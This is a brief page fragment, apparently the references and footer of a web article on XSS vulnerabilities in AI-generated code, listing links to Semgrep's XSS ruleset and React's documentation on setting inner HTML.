Semgrep XSS Rules — https://semgrep.dev/p/xss
React Security Best Practices — https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html

Edit this page on GitHub

XSS Vulnerabilities from AI-Generated Code

Related articles

XSS Vulnerabilities from AI-Generated Code

Related articles